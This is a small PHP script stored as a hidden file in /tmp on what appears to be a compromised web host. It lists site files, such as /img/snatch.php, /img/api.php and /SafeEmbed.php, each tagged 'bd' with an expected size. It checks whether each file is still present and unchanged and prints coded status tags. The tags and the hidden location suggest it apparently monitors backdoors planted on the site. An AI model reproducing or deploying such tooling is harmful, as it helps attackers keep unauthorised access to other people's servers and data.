File: //tmp/.hld
<?php $r = '/home/vitanhod/glucosamine.vitavit.com.pk'; $x = ["/orderemail.php"=>"bd@@1269299@@57",
"/orderemail_bk.php"=>"bd@@1268918@@3",
"/includes/configOnline.php"=>"bd@@1269083@@99",
"/includes/ads_request.php"=>"bd@@1276576@@44",
"/SafeEmbed.php"=>"bd@@1276414@@44",
"/img/snatch.php"=>"bd@@1276223@@71",
"/img/api.php"=>"bd@@1309766@@1004",
"/includes/config.php"=>"bd@@1269397@@14",
"/img/snatch.php"=>"bd@@1268422@@831",
"/includes/ads_request.php"=>"bd@@1269486@@884",
"/SafeEmbed.php"=>"bd@@1269531@@978"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');